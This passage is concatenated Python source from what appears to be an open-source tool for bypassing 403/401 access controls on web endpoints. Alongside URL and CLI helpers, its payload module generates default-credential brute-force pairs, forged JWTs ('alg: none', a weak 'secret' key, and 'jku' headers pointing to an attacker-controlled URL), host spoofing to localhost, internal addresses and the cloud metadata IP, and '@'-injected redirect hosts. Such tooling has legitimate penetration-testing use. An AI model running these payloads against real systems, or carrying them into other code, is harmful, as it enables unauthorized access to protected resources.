			Serialize the test record to a JSON-compatible dictionary, excluding certain attributes.
			"""
			return self.__remove(["id_int", "proxy", "status", "length", "response", "response_headers", "error"])

		def __remove(self, attributes: list[str]):
			"""
			Serialize the test record to a JSON-compatible dictionary and exclude the specified attributes.
			"""
			tmp = self.__dict__
			for attribute in attributes:
				tmp.pop(attribute, None)
			return tmp

		def __build_command(self):
			"""
			Build a cURL command.
			"""
			tmp = ["curl", "--path-as-is", "-iskL"]
			# --------------------------------
			if self.engine in [general.Engine.HTTP_CLIENT]:
				tmp.append("--http1.0")
			# --------------------------------
			"""
			NOTE: These options only make the entire command look messy and are unnecessary when double-checking the results.
			tmp.extend([
				f"--max-redirs {max_redirects}",
				f"--connect-timeout {connect_timeout}",
				f"-m {read_timeout}"
			])
			"""
			# --------------------------------
			if self.proxy:
				tmp.append(set_opt(self.proxy, "-x"))
			if self.user_agent:
				tmp.append(set_opt(self.user_agent, "-A"))
			for header in self.headers:
				tmp.append(set_opt(header, "-H"))
			for cookie in self.cookies:
				tmp.append(set_opt(cookie, "-b"))
			if self.body:
				tmp.append(set_opt(self.body, "-d"))
			if self.method:
				tmp.append(set_opt(self.method, "-X"))
			if self.url:
				tmp.append(set_opt(self.url))
			# --------------------------------
			tmp = (" ").join(tmp)
			return tmp



#!/usr/bin/env python3

from . import array, grep, ip, path

import enum, urllib.parse

class Scheme(enum.Enum):
	"""
	Enum containing URL schemes.
	"""
	HTTP  = "http"
	HTTPS = "https"

	@classmethod
	def all(cls):
		"""
		Get all URL schemes.
		"""
		return [
			cls.HTTP,
			cls.HTTPS
		]

	@classmethod
	def all_lower(cls):
		"""
		Get all URL schemes in lowercase.
		"""
		return [entry.value.lower() for entry in cls.all()]

	@classmethod
	def get_default_port(cls, scheme: str):
		"""
		Get the default port number for the specified URL scheme.
		"""
		mapping = {
			Scheme.HTTP : 80,
			Scheme.HTTPS: 443
		}
		return mapping[Scheme(scheme)]

	@classmethod
	def get_ssl_status(cls, scheme: str):
		"""
		Get the SSL/TLS status for the specified URL scheme.
		"""
		mapping = {
			Scheme.HTTP : "off",
			Scheme.HTTPS: "on"
		}
		return mapping[Scheme(scheme)]

# ----------------------------------------

def validate(url: str):
	"""
	Validate a URL.
	"""
	success = False
	message = ""
	tmp = urllib.parse.urlsplit(url)
	if not tmp.scheme:
		message = f"URL scheme is required: {url}"
	elif tmp.scheme not in Scheme.all_lower():
		message = f"Supported URL schemes are 'http' and 'https': {url}"
	elif not tmp.netloc:
		message = f"Invalid domain name: {url}"
	elif tmp.port and (tmp.port < 1 or tmp.port > 65535):
		message = f"Port number is out of range: {url}"
	else:
		success = True
	return success, message

# ----------------------------------------

def parse_qs(string: str):
	"""
	Parse a URL query string or fragment while preserving duplicate parameters and empty values.
	"""
	return urllib.parse.parse_qs(string, keep_blank_values = True)

def urlencode(parsed: dict[str, list[str]]):
	"""
	Stringify a parsed URL query string or fragment while preserving duplicate parameters and empty values.
	"""
	return urllib.parse.urlencode(parsed, doseq = True)

def quote(string: str):
	"""
	URL encode a string.
	"""
	return urllib.parse.quote(string)

# ----------------------------------------

def build_default_http_url(scheme: str, host: str, port: int, path: str):
	"""
	Build a default HTTP URL from the initial URL.\n
	If the initial URL scheme is not HTTP, the port number will default to 80.
	"""
	if scheme != Scheme.HTTP.value:
		port = Scheme.get_default_port(Scheme.HTTP.value)
	return f"{Scheme.HTTP.value}://{host}:{port}{path}"

def build_default_https_url(scheme: str, host: str, port: int, path: str):
	"""
	Build a default HTTPS URL from the initial URL.\n
	If the initial URL scheme is not HTTPS, the port number will default to 443.
	"""
	if scheme != Scheme.HTTPS.value:
		port = Scheme.get_default_port(Scheme.HTTPS.value)
	return f"{Scheme.HTTPS.value}://{host}:{port}{path}"

# ----------------------------------------

class URL:

	def __init__(self, url: str, ignore_parameters = False):
		"""
		Class for storing URL details.
		"""
		tmp               = urllib.parse.urlsplit(url)
		self.scheme       = tmp.scheme.lower()
		self.port         = tmp.port or Scheme.get_default_port(self.scheme)
		self.domain       = self.Domain(self.scheme, grep.replace(tmp.netloc, f":{self.port}$"), self.port)
		self.ip           = self.IP(self.scheme, ip.get(self.domain.domain.rsplit("@", 1)[-1]), self.port)
		self.query_string = self.QueryString(tmp.query, ignore_parameters)
		self.fragment     = self.Fragment(tmp.fragment, ignore_parameters)
		self.path         = self.Path(tmp.path, self.query_string, self.fragment)
		self.full         = self.Full(self.scheme, self.domain, self.ip, self.port, self.path)

	def is_ip(self):
		"""
		Check if the initial URL host is an IP address.
		"""
		return self.domain.domain == self.ip.ip

	def is_https(self):
		"""
		Check if the initial URL scheme is HTTPS.
		"""
		return self.scheme == Scheme.HTTPS.value

	class Domain:

		def __init__(self, scheme: str, domain: str, port: int):
			"""
			Class for storing domain name details.
			"""
			self.domain             = domain
			self.domain_port        = f"{domain}:{port}"
			self.scheme_domain      = f"{scheme}://{domain}"
			self.scheme_domain_port = f"{scheme}://{domain}:{port}"
			self.domains            = [self.domain, self.domain_port]
			self.scheme_domains     = [self.scheme_domain, self.scheme_domain_port]

	class IP:

		def __init__(self, scheme: str, ip: str, port: int):
			"""
			Class for storing IP address details.
			"""
			self.ip             = ip
			self.ip_port        = f"{ip}:{port}"
			self.scheme_ip      = f"{scheme}://{ip}"
			self.scheme_ip_port = f"{scheme}://{ip}:{port}"
			self.ips            = [self.ip, self.ip_port]
			self.scheme_ips     = [self.scheme_ip, self.scheme_ip_port]

	class QueryString:

		def __init__(self, query_string: str, ignore = False):
			"""
			Class for storing URL query string details.
			"""
			self.parsed = {}
			self.string = ""
			"""
			If exists, a string starting with '?'.
			"""
			if not ignore and query_string:
				self.parsed = parse_qs(query_string)
				self.string = f"?{urlencode(self.parsed)}"

	class Fragment:

		def __init__(self, fragment: str, ignore = False):
			"""
			Class for storing URL fragment details.\n
			At the moment, there are no tests related to the URL fragment.
			"""
			self.string = ""
			"""
			If exists, a string starting with '#'.
			"""
			if not ignore and fragment:
				self.string = f"#{fragment}"

	class Path:

		def __init__(self, path_no_parameters: str, query_string: "URL.QueryString", fragment: "URL.Fragment"):
			"""
			Class for storing URL path details.
			"""
			self.path_no_parameters = path.replace_multiple_slashes(path_no_parameters)
			"""
			If exists, a string starting with '/'.
			"""
			self.path               = self.path_no_parameters + query_string.string + fragment.string
			"""
			If exists, a string starting with '/'.
			"""

	class Full:

		def __init__(self, scheme: str, domain: "URL.Domain", ip: "URL.IP", port: int, path: "URL.Path"):
			"""
			Class for storing full URL details.
			"""
			self.initial = self.Host(domain, ip, path)
			self.domain  = self.Scheme(scheme, domain.domain, port, path.path)
			self.ip      = self.Scheme(scheme, ip.ip, port, path.path)

		class Host:

			def __init__(self, domain: "URL.Domain", ip: "URL.IP", path: "URL.Path"):
				"""
				Class for storing full URL details based on the URL host.
				"""
				self.domain = domain.scheme_domain_port + path.path
				self.ip     = ip.scheme_ip_port + path.path
				self.all    = array.unique([self.domain, self.ip])

		class Scheme:

			def __init__(self, scheme: str, host: str, port: int, path: str):
				"""
				Class for storing full URL details based on the URL scheme.
				"""
				self.https = build_default_https_url(scheme, host, port, path)
				self.http  = build_default_http_url(scheme, host, port, path)
				self.all   = [self.https, self.http]



#!/usr/bin/env python3

from . import array, config, cookie, directory, general, grep, header, url

import argparse, bot_safe_agents, sys

class MyArgParser(argparse.ArgumentParser):

	def print_help(self):
		print(f"Stresser {config.APP_VERSION} ( github.com/ivan-sincek/forbidden )")
		print("")
		print("Usage:   stresser -u url                       -r repeat -th threads -dir directory [-f force] [-o out         ]")
		print("Example: stresser -u https://example.com/admin -r 1000   -th 200     -dir results   [-f GET  ] [-o results.json]")
		print("")
		print("DESCRIPTION")
		print("    Bypass 4xx HTTP response status codes with stress testing")
		print("URL")
		print("    Inaccessible URL")
		print("    -u, --url = https://example.com/admin | etc.")
		print("IGNORE PARAMETERS")
		print("    Ignore URL query string and fragment")
		print("    -ip, --ignore-parameters")
		print("IGNORE REQUESTS")
		print("    Where applicable, use PycURL instead of the default Python Requests engine")
		print("    -ir, --ignore-requests")
		print("FORCE")
		print("    Force an HTTP method for all non-specific tests")
		print("    -f, --force = GET | POST | CUSTOM | etc.")
		print("HEADER")
		print("    Any number of extra HTTP request headers")
		print("    Extra HTTP request headers will not override test-specific HTTP request headers")
		print("    Semi-colon in, e.g., 'Content-Type;' will expand to an empty HTTP request header")
		print("    -H, --header = \"Authorization: Bearer ey...\" | Content-Type; | etc.")
		print("COOKIE")
		print("    Any number of extra HTTP cookies")
		print("    Extra HTTP cookies will not override test-specific HTTP cookies")
		print("    -b, --cookie = PHPSESSIONID=3301 | etc.")
		print("IGNORE")
		print("    RegEx to filter out false positive 200 OK results")
		print("    -i, --ignore = Inaccessible | \"Access Denied\" | \"Error: .+\" | etc.")
		print("CONTENT LENGTHS")
		print("    HTTP response content lengths to filter out false positive 200 OK results")
		print("    Specify 'initial' to ignore the content length of the initial HTTP response")
		print("    Use comma-separated values")
		print("    -l, --content-lengths = 12 | initial | etc.")
		print("REQUEST TIMEOUT")
		print("    Request timeout in seconds")
		print("    Default: 60")
		print("    -rt, --request-timeout = 30 | 90 | etc.")
		print("REPEAT")
		print("    Number of HTTP requests per test")
		print("    -r, --repeat = 1000 | etc.")
		print("THREADS")
		print("    Number of parallel threads to run")
		print("    -th, --threads = 20 | etc.")
		print("USER AGENT")
		print("    User agent to use")
		print(f"    Default: {config.USER_AGENT}")
		print("    -a, --user-agent = random[-all] | curl/3.30.1 | etc.")
		print("PROXY")
		print("    Web proxy to use")
		print("    -x, --proxy = http://127.0.0.1:8080 | etc.")
		print("HTTP RESPONSE STATUS CODES")
		print("    Include only specific HTTP response status codes in the results")
		print("    Default: 2xx, 3xx")
		print("    Use comma-separated values")
		print("    -sc, --status-codes = 1xx | 2xx | 3xx | 4xx | 5xx | all")
		print("SHOW TABLE")
		print("    Display the results in a table format instead of JSON format")
		print("    Intended for use on a wide screen")
		print("    -st, --show-table")
		print("OUT")
		print("    Output file")
		print("    -o, --out = results.json | etc.")
		print("DIRECTORY")
		print("    Output directory")
		print("    All valid and unique HTTP responses will be saved in this directory")
		print("    -dir, --directory = results | etc.")
		print("DUMP")
		print("    Dump all the test records into the output file without running any")
		print("    -dmp, --dump")
		print("DEBUG")
		print("    Enable debug output")
		print("    -dbg, --debug")

	def error(self, message):
		if len(sys.argv) > 1:
			print("Missing a mandatory option (-u, -r, -th, -dir) and/or optional (-ip, -ir, -f, -H, -b, -i, -l, -rt, -a, -x, -sc, -st, -o, -dmp, -dbg)")
			print("Use -h or --help for more info")
		else:
			self.print_help()
		exit()

class Validate:

	def __init__(self):
		"""
		Class for validating and managing CLI arguments.
		"""
		self.__parser = MyArgParser()
		self.__parser.add_argument("-u"  , "--url"              , required = True , type   = str         , default = ""   )
		self.__parser.add_argument("-ip" , "--ignore-parameters", required = False, action = "store_true", default = False)
		self.__parser.add_argument("-ir" , "--ignore-requests"  , required = False, action = "store_true", default = False)
		self.__parser.add_argument("-f"  , "--force"            , required = False, type   = str.upper   , default = ""   )
		self.__parser.add_argument("-H"  , "--header"           , required = False, action = "append"    , nargs   = "+"  )
		self.__parser.add_argument("-b"  , "--cookie"           , required = False, action = "append"    , nargs   = "+"  )
		self.__parser.add_argument("-i"  , "--ignore"           , required = False, type   = str         , default = ""   )
		self.__parser.add_argument("-l"  , "--content-lengths"  , required = False, type   = str.lower   , default = ""   )
		self.__parser.add_argument("-rt" , "--request-timeout"  , required = False, type   = str         , default = ""   )
		self.__parser.add_argument("-r"  , "--repeat"           , required = False, type   = str         , default = ""   )
		self.__parser.add_argument("-th" , "--threads"          , required = False, type   = str         , default = ""   )
		self.__parser.add_argument("-a"  , "--user-agent"       , required = False, type   = str         , default = ""   )
		self.__parser.add_argument("-x"  , "--proxy"            , required = False, type   = str         , default = ""   )
		self.__parser.add_argument("-sc" , "--status-codes"     , required = False, type   = str.lower   , default = ""   )
		self.__parser.add_argument("-st" , "--show-table"       , required = False, action = "store_true", default = False)
		self.__parser.add_argument("-o"  , "--out"              , required = False, type   = str         , default = ""   )
		self.__parser.add_argument("-dir", "--directory"        , required = False, type   = str         , default = ""   )
		self.__parser.add_argument("-dmp", "--dump"             , required = False, action = "store_true", default = False)
		self.__parser.add_argument("-dbg", "--debug"            , required = False, action = "store_true", default = False)

	def validate_args(self):
		"""
		Validate and return the CLI arguments.
		"""
		self.__success = True
		self.__args = self.__parser.parse_args()
		self.__validate_url()
		self.__validate_force()
		self.__validate_header()
		self.__validate_cookie()
		self.__validate_ignore()
		self.__validate_content_lengths()
		self.__validate_request_timeout()
		self.__validate_repeat()
		self.__validate_threads()
		self.__validate_user_agent()
		self.__validate_proxy()
		self.__validate_status_codes()
		self.__validate_directory()
		self.__validate_dump()
		return self.__success, self.__args

	def __error(self, message: str):
		"""
		Set the success flag to 'False' to prevent the main task from executing, and print an error message.
		"""
		self.__success = False
		general.print_error(message)

	# ------------------------------------

	def __validate_url(self):
		success, message = url.validate(self.__args.url)
		if not success:
			self.__error(f"Inaccessible URL: {message}")

	def __validate_force(self):
		if self.__args.force:
			self.__args.force = self.__args.force.strip()
			if not self.__args.force:
				self.__error("Forced HTTP method is not valid")

	def __validate_header(self):
		tmp = []
		if self.__args.header:
			for entry in self.__args.header:
				key, value = header.get_key_value(entry[0])
				if not key:
					self.__error(f"Invalid HTTP request header: {entry[0]}")
					continue
				tmp.append(header.format_key_value(key, value))
		self.__args.header = tmp

	def __validate_cookie(self):
		tmp = []
		if self.__args.cookie:
			for entry in self.__args.cookie:
				key, value = cookie.get_key_value(entry[0])
				if not key:
					self.__error(f"Invalid HTTP cookie: {entry[0]}")
					continue
				tmp.append(cookie.format_key_value(key, value))
		self.__args.cookie = tmp

	def __validate_ignore(self):
		if self.__args.ignore:
			success, message = grep.validate(self.__args.ignore)
			if not success:
				self.__error(message)

	def __validate_content_lengths(self):
		tmp = []
		if self.__args.content_lengths:
			content_lengths = array.remove_empty_strings(self.__args.content_lengths.split(","))
			if not content_lengths:
				self.__error("No content lengths were specified")
			else:
				supported = general.ContentLength.all_lower()
				for content_length in content_lengths:
					if content_length in supported:
						tmp.append(general.ContentLength(content_length))
					elif not content_length.isdigit() or int(content_length) < 0:
						self.__error("Content lengths must be either 'initial' or numeric greater than or equal to zero")
						break
					else:
						tmp.append(int(content_length))
				tmp = array.unique(tmp)
		self.__args.content_lengths = tmp

	def __validate_request_timeout(self):
		tmp = 60
		if self.__args.request_timeout:
			if not self.__args.request_timeout.isdigit():
				self.__error("Request timeout must be numeric")
			else:
				tmp = int(self.__args.request_timeout)
				if tmp <= 0:
					self.__error("Request timeout must be greater than zero")
		self.__args.request_timeout = tmp

	def __validate_repeat(self):
		if not self.__args.repeat.isdigit():
			self.__error("Number of HTTP requests per test must be numeric")
		else:
			self.__args.repeat = int(self.__args.repeat)
			if self.__args.repeat <= 0:
				self.__error("Number of HTTP requests per test must be greater than zero")

	def __validate_threads(self):
		if not self.__args.threads.isdigit():
			self.__error("Number of parallel threads must be numeric")
		else:
			self.__args.threads = int(self.__args.threads)
			if self.__args.threads <= 0:
				self.__error("Number of parallel threads must be greater than zero")

	def __validate_user_agent(self):
		tmp = [config.USER_AGENT]
		if self.__args.user_agent:
			lower = self.__args.user_agent.lower()
			if lower == general.UserAgent.RANDOM_ALL.value:
				tmp = bot_safe_agents.get_all()
			elif lower == general.UserAgent.RANDOM.value:
				tmp = [bot_safe_agents.get_random()]
			else:
				tmp = [self.__args.user_agent]
		self.__args.user_agent = tmp

	def __validate_proxy(self):
		if self.__args.proxy:
			success, message = url.validate(self.__args.proxy)
			if not success:
				self.__error(f"Proxy URL: {message}")

	def __validate_status_codes(self):
		if self.__args.status_codes:
			tmp = []
			status_codes = array.remove_empty_strings(self.__args.status_codes.split(","))
			if not status_codes:
				self.__error("No HTTP response status codes were specified")
			else:
				supported = general.StatusCode.all_lower()
				for status_code in status_codes:
					if status_code == general.StatusCode.ALL.value:
						tmp.extend(general.StatusCode.all())
					elif status_code not in supported:
						self.__error("Supported HTTP response status codes are '1xx', '2xx', '3xx', '4xx', '5xx', or 'all'")
						break
					else:
						tmp.append(general.StatusCode(status_code))
				tmp = array.unique(tmp)
			self.__args.status_codes = tmp
		else:
			self.__args.status_codes = [general.StatusCode.STATUS_2XX, general.StatusCode.STATUS_3XX]

	def __validate_directory(self):
		if self.__args.directory:
			if not directory.is_directory(self.__args.directory):
				self.__error(f"\"{self.__args.directory}\" does not exist or is not a directory")

	def __validate_dump(self):
		if self.__args.dump and not self.__args.out:
			self.__error("Cannot dump the test records because the output file is not specified")



#!/usr/bin/env python3

def unique(array: list[str]):
	"""
	Remove duplicates from a list.
	"""
	seen = set()
	return [x for x in array if not (x in seen or seen.add(x))]

def remove_empty_strings(array: list[str]) -> list[str]:
	"""
	Strip whitespace from each string in a list, and remove empty strings.
	"""
	tmp = []
	for entry in array:
		entry = entry.strip()
		if entry:
			tmp.append(entry)
	return tmp

def to_array(value: str | list[str]):
	"""
	Returns a value as a list if the value is not one already.
	"""
	return value if isinstance(value, list) else [value]



#!/usr/bin/env python3

__ENCODING  = "UTF-8"
__DECODINGS = ["ISO-8859-1", "UTF-8"]

def encode(string: str):
	"""
	Encode a string.
	"""
	return string.encode(__ENCODING)

def encode_multiple(strings: list[str]):
	"""
	Encode multiple strings.
	"""
	return [encode(string) for string in strings]

def decode(bytes: bytes):
	"""
	Decode bytes.\n
	Returns an empty string and an error message on failure.
	"""
	string = ""
	message = ""
	for encoding in __DECODINGS:
		try:
			string = bytes.decode(encoding)
			message = ""
			break
		except UnicodeDecodeError as ex:
			message = str(ex)
	return string, message



#!/usr/bin/env python3

from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives            import serialization

def create_private_key():
	"""
	Create a random RSA private key.
	"""
	private_key = rsa.generate_private_key(65537, 2048)
	return private_key.private_bytes(serialization.Encoding.PEM, serialization.PrivateFormat.TraditionalOpenSSL, serialization.NoEncryption())



#!/usr/bin/env python3

from . import array, crypto, encode, path, url

class CommonValues:

	def __init__(self):
		"""
		Class for storing predefined values.\n
		TO DO: Add support for IPv6.
		"""
		self.localhost = self.Host(
			domains = ["localhost", encode.to_unicode("localhost")],
			ips     = ["127.0.0.1", "127.1", "127.000.000.001", encode.to_unicode("127.0.0.1")]
		)
		self.internal  = self.Host(
			domains = [],
			ips     = ["0.0.0.0", "10.1.1.1", "169.254.169.254", "172.16.1.1", "192.168.1.1"]
		)
		self.public    = self.Host(
			domains = [],
			ips     = []
		)
		# --------------------------------
		self.methods = ["ACL", "ARBITRARY", "BASELINE-CONTROL", "BIND", "CHECKIN", "CHECKOUT", "CONNECT", "COPY", "DELETE", "GET", "HEAD", "INDEX", "LABEL", "LINK", "LOCK", "MERGE", "MKACTIVITY", "MKCALENDAR", "MKCOL", "MKREDIRECTREF", "MKWORKSPACE", "MOVE", "OPTIONS", "ORDERPATCH", "PATCH", "POST", "PRI", "PROPFIND", "PROPPATCH", "PUT", "REBIND", "REPORT", "SEARCH", "SHOWMETHOD", "SPACEJUMP", "TEXTSEARCH", "TRACE", "TRACK", "UNBIND", "UNCHECKOUT", "UNLINK", "UNLOCK", "UPDATE", "UPDATEREDIRECTREF", "VERSION-CONTROL"]
		self.ports   = [80, 81, 443, 4443, 8000, 8008, 8080, 8081, 8403, 8443, 8888, 9000, 9008, 9080, 9081, 9403, 9443]
		# --------------------------------
		self.usernames = ["admin", "cisco", "gateway", "guest", "jigsaw", "root", "router", "switch", "sysadmin", "tomcat", "wampp", "xampp"]
		self.passwords = ["admin", "cisco", "default", "gateway", "guest", "jigsaw", "password", "root", "router", "secret", "switch", "sysadmin", "tomcat", "toor", "wampp", "xampp"]

	class Host:

		def __init__(self, domains: list[str] = [], ips: list[str] = []):
			"""
			Class for storing predefined values based on the URL host.
			"""
			self.domains = domains
			self.ips     = ips
			self.all     = array.unique(self.domains + self.ips)

values = CommonValues()
"""
Singleton class instance for fetching predefined values.
"""

# ----------------------------------------

def get_relative_paths(inaccessible_url: url.URL):
	"""
	Get a list of expanded relative URL paths with and without the URL parameters.\n
	Returns a unique list.
	"""
	return path.expand(inaccessible_url.path.path_no_parameters, inaccessible_url.query_string.string, inaccessible_url.fragment.string)

# ----------------------------------------

def get_basic_credentials():
	"""
	Get null values and predefined Base64 encoded credentials.
	"""
	tmp = ["", "null", "nil", "None"]
	for username in values.usernames:
		for password in values.passwords:
			tmp.append(encode.b64_credentials(username, password))
	return array.unique(tmp)

def get_bearer_credentials(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get null values, malformed JWTs, and predefined JWTs.
	"""
	tmp = ["", "null", "nil", "None"]
	# ------------------------------------
	payload = {"admin": True}
	payload_encoded = encode.b64_payload(payload)
	# ------------------------------------
	for alg in ["none", "nOnE", "None", "NONE"]:
		headers = encode.b64_payload({"alg": alg, "typ": "JWT"})
		tmp.append(f"{headers}.{payload_encoded}.")
	# ------------------------------------
	headers = encode.b64_payload({"alg": "ES256", "typ": "JWT"})
	tmp.append(f"{headers}.{payload_encoded}.MAYCAQACAQA")
	# ------------------------------------
	for key in ["secret", encode.b64("secret")]:
		tmp.append(encode.jwt("HS256", key, payload))
	# ------------------------------------
	key = crypto.create_private_key()
	for root_url in inaccessible_url.domain.scheme_domains + evil_url.domain.scheme_domains:
		tmp.append(encode.jwt("RS256", key, payload, {"jku": f"{root_url}/.well-known/jwks.json"}))
	# ------------------------------------
	return array.unique(tmp)

# ----------------------------------------

def get_domains(inaccessible_url: url.URL, evil_url: url.URL, include_builtin_values = True):
	"""
	Get a list of domain names with and without the port number.\n
	Returns a unique list.
	"""
	tmp  = []
	tmp += inaccessible_url.domain.domains if not inaccessible_url.is_ip() else []
	tmp += evil_url.domain.domains         if not evil_url.is_ip()         else []
	if include_builtin_values:
		for domain in values.localhost.domains:
			tmp.extend([
				domain,
				f"{domain}:{inaccessible_url.port}"
			])
		for domain in values.internal.domains:
			tmp.append(domain)
	return array.unique(tmp)

def get_ips(inaccessible_url: url.URL, evil_url: url.URL, include_builtin_values = True):
	"""
	Get a list of IP addresses with and without the port number.\n
	Returns a unique list.
	"""
	tmp = inaccessible_url.ip.ips + evil_url.ip.ips
	if include_builtin_values:
		for ip in values.localhost.ips:
			tmp.extend([
				ip,
				f"{ip}:{inaccessible_url.port}"
			])
		for ip in values.internal.ips:
			tmp.append(ip)
	return array.unique(tmp)

def get_hosts(inaccessible_url: url.URL, evil_url: url.URL, include_builtin_values = True):
	"""
	Get a list of IP addresses and domain names with and without the port number.\n
	Returns a unique list.
	"""
	return array.unique(get_domains(inaccessible_url, evil_url, include_builtin_values) + get_ips(inaccessible_url, evil_url, include_builtin_values))

# ----------------------------------------

def get_multi_domains(inaccessible_url: url.URL):
	"""
	Get a list of comma-separated domain names with and without the port number.\n
	Returns a unique list.
	"""
	tmp = []
	if not inaccessible_url.is_ip():
		for localhost in ["localhost", f"localhost:{inaccessible_url.port}"]:
			for initial in inaccessible_url.domain.domains:
				tmp.append(f"{localhost},{initial}")
	return array.unique(tmp)

def get_multi_ips(inaccessible_url: url.URL):
	"""
	Get a list of comma-separated IP addresses with and without the port number.\n
	Returns a unique list.
	"""
	tmp = []
	for localhost in ["127.0.0.1", f"127.0.0.1:{inaccessible_url.port}"]:
		for initial in inaccessible_url.ip.ips:
			tmp.append(f"{localhost},{initial}")
	return array.unique(tmp)

def get_multi_hosts(inaccessible_url: url.URL):
	"""
	Get a list of comma-separated IP addresses and domain names with and without the port number.\n
	Returns a unique list.
	"""
	return array.unique(get_multi_domains(inaccessible_url) + get_multi_ips(inaccessible_url))

# ----------------------------------------

def get_root_urls(inaccessible_url: url.URL, evil_url: url.URL, include_builtin_values = True):
	"""
	Get a list of root URLs with an IP address and domain name, with and without the port number.\n
	Returns a unique list.
	"""
	tmp = []
	for url in [inaccessible_url, evil_url]:
		for root_url in url.domain.scheme_domains + url.ip.scheme_ips:
			tmp.append(root_url)
	if include_builtin_values:
		for host in values.localhost.all:
			tmp.extend([
				f"{inaccessible_url.scheme}://{host}",
				f"{inaccessible_url.scheme}://{host}:{inaccessible_url.port}"
			])
		for host in values.internal.all:
			tmp.append(f"{inaccessible_url.scheme}://{host}")
	return array.unique(tmp)

def get_full_urls(inaccessible_url: url.URL, evil_url: url.URL, include_builtin_values = True):
	"""
	Get a list of full URLs with an IP address and domain name, with and without the port number.\n
	Returns a unique list.
	"""
	tmp = []
	for url in [inaccessible_url, evil_url]:
		for root_url in url.domain.scheme_domains + url.ip.scheme_ips:
			tmp.extend([
				f"{root_url}{url.path.path}",
				f"{root_url}{url.path.path_no_parameters}"
			])
	if include_builtin_values:
		for host in values.localhost.all:
			tmp.extend([
				f"{inaccessible_url.scheme}://{host}{inaccessible_url.path.path}",
				f"{inaccessible_url.scheme}://{host}{inaccessible_url.path.path_no_parameters}",
				f"{inaccessible_url.scheme}://{host}:{inaccessible_url.port}{inaccessible_url.path.path}",
				f"{inaccessible_url.scheme}://{host}:{inaccessible_url.port}{inaccessible_url.path.path_no_parameters}"
			])
		for host in values.internal.all:
			tmp.append(f"{inaccessible_url.scheme}://{host}")
	return array.unique(tmp)

# ----------------------------------------

def get_broken_domains(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get a list of broken domain names with and without the port number.\n
	Returns a unique list.
	"""
	tmp = []
	if not inaccessible_url.is_ip():
		for evil in evil_url.domain.domains:
			for initial in inaccessible_url.domain.domains:
				for injection in ["@", " @", "#@"]:
					tmp.append(initial + injection + evil)
	return array.unique(tmp)

def get_broken_ips(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get a list of broken IP addresses with and without the port number.\n
	Returns a unique list.
	"""
	tmp = []
	for evil in evil_url.ip.ips:
		for initial in inaccessible_url.ip.ips:
			for injection in ["@", " @", "#@"]:
				tmp.append(initial + injection + evil)
	return array.unique(tmp)

def get_broken_hosts(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get a list of broken IP addresses and domain names with and without the port number.\n
	Returns a unique list.
	"""
	return array.unique(get_broken_domains(inaccessible_url, evil_url) + get_broken_ips(inaccessible_url, evil_url))

# ----------------------------------------

def get_broken_root_urls(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get a list of broken root URLs with an IP address and domain name, with and without the port number.\n
	Returns a unique list.
	"""
	tmp = []
	for host in get_broken_hosts(inaccessible_url, evil_url):
		tmp.append(f"{evil_url.scheme}://{host}")
	return array.unique(tmp)

def get_broken_full_urls(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get a list of broken full URLs with an IP address and domain name, with and without the port number.\n
	Returns a unique list.
	"""
	tmp = []
	for root_url in get_broken_root_urls(inaccessible_url, evil_url):
		tmp.extend([
			f"{root_url}{evil_url.path.path}",
			f"{root_url}{evil_url.path.path_no_parameters}"
		])
	return array.unique(tmp)

# ----------------------------------------

def get_redirect_domains(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get a list of redirect domain names with and without the port number.\n
	Returns a unique list.
	"""
	tmp = []
	if not evil_url.is_ip():
		for evil in evil_url.domain.domains:
			tmp.append(evil)
			if not inaccessible_url.is_ip():
				tmp.append(f"{inaccessible_url.domain.domain}.{evil}")
	return array.unique(tmp)

def get_redirect_ips(inaccessible_url_ignored: url.URL, evil_url: url.URL):
	"""
	Get a list of redirect IP addresses with and without the port number.\n
	Returns a unique list.
	"""
	return array.unique(evil_url.ip.ips)

def get_redirect_hosts(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get a list of redirect IP addresses and domain names with and without the port number.\n
	Returns a unique list.
	"""
	return array.unique(get_redirect_domains(inaccessible_url, evil_url) + get_redirect_ips(inaccessible_url, evil_url))

# ----------------------------------------

def get_redirect_root_urls(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get a list of redirect root URLs with an IP address and domain name, with and without the port number.\n
	Returns a unique list.
	"""
	tmp = []
	for host in get_redirect_hosts(inaccessible_url, evil_url):
		tmp.append(f"{evil_url.scheme}://{host}")
	return array.unique(tmp)

def get_redirect_full_urls(inaccessible_url: url.URL, evil_url: url.URL):
	"""
	Get a list of redirect full URLs with and without the port number and URL parameters.\n
	Returns a unique list.
	"""
	tmp = []
	for root_url in get_redirect_root_urls(inaccessible_url, evil_url):
		tmp.extend([
			f"{root_url}{evil_url.path.path}",
			f"{root_url}{evil_url.path.path_no_parameters}"
		])
	for evil in evil_url.domain.scheme_domains + evil_url.ip.scheme_ips:
		for initial in [inaccessible_url.domain.domain, inaccessible_url.ip.ip]:
			for injection in [f"{path.SEP}", f"{path.SEP}."]:
				tmp.extend([
					f"{evil}{injection}{initial}{evil_url.path.path}",
					f"{evil}{injection}{initial}{evil_url.path.path_no_parameters}"
				])
	return array.unique(tmp)



#!/usr/bin/env python3

from . import array, grep

SEP = "/"

def replace_multiple_slashes(path_no_parameters: str):
	"""
	Replace multiple consecutive forward slashes with a single forward slash.\n
	For example, replace '//' with '/', etc.
	"""
	return grep.replace(path_no_parameters, r"\/{2,}", SEP)

def prepend_slash(path: str):
	"""
	Append a single forward slash if one does not already exist.
	"""
	if path and not path.startswith(SEP):
		path = SEP + path
	return path

def remove_trailing_slash(root_url: str):
	"""
	Remove a single forward slash from the end if one already exists.
	"""
	if root_url and root_url.endswith(SEP):
		root_url = root_url[:-1]
	return root_url

def join(root_url: str, path: str):
	"""
	Concatenate a root URL with the specified URL path.
	"""
	return remove_trailing_slash(root_url) + prepend_slash(path) if path else root_url

def join_multiple(root_url: str, paths: list[str]):
	"""
	Concatenate a root URL with the specified URL paths.\n
	Returns a unique list.
	"""
	return array.unique(join(root_url, path) for path in paths) if paths else [root_url]

def expand(path_no_parameters: str, query_string = "", fragment = ""):
	"""
	Expand a relative URL path.\n
